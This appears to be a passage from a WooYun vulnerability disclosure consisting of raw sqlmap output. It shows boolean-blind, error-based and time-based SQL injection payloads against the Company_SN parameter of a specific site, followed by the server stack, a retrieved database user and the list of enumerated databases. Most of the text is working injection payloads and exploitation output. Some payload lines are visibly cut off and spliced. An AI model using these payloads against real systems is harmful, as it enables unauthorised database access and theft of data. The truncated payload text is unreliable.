WooYun.org

Place: GET
Parameter: Company_SN
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Company_SN=21779 AND 1871=1871&PHPSESSID=msn2089luncua5u8tu
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: Company_SN=21779 AND (SELECT 4338 FROM(SELECT COUNT(*),CONC
366633a,(SELECT (CASE WHEN (4338=4338) THEN 1 ELSE 0 END)),0x3a796f753a,
ND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&PHPSESSI
9luncua5u8tu8o570ki2
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: Company_SN=21779 AND SLEEP(5)&PHPSESSID=msn2089luncua5u8tu8
---
[20:29:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.3.16
back-end DBMS: MySQL 5.0
[20:29:14] [INFO] fetching current user
[20:29:15] [INFO] retrieved: twinner@localhost
current user:    'twinner@localhost'

available databases [4]:
[*] information_schema
[*] muchcalm
[*] twinner
[*] twinner_dev